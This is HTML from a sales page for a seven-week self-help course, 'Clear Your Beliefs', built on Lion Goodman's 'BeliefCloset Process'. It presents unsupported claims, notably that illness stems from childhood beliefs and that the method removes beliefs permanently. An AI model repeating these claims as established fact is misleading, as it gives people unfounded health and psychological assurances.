class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. 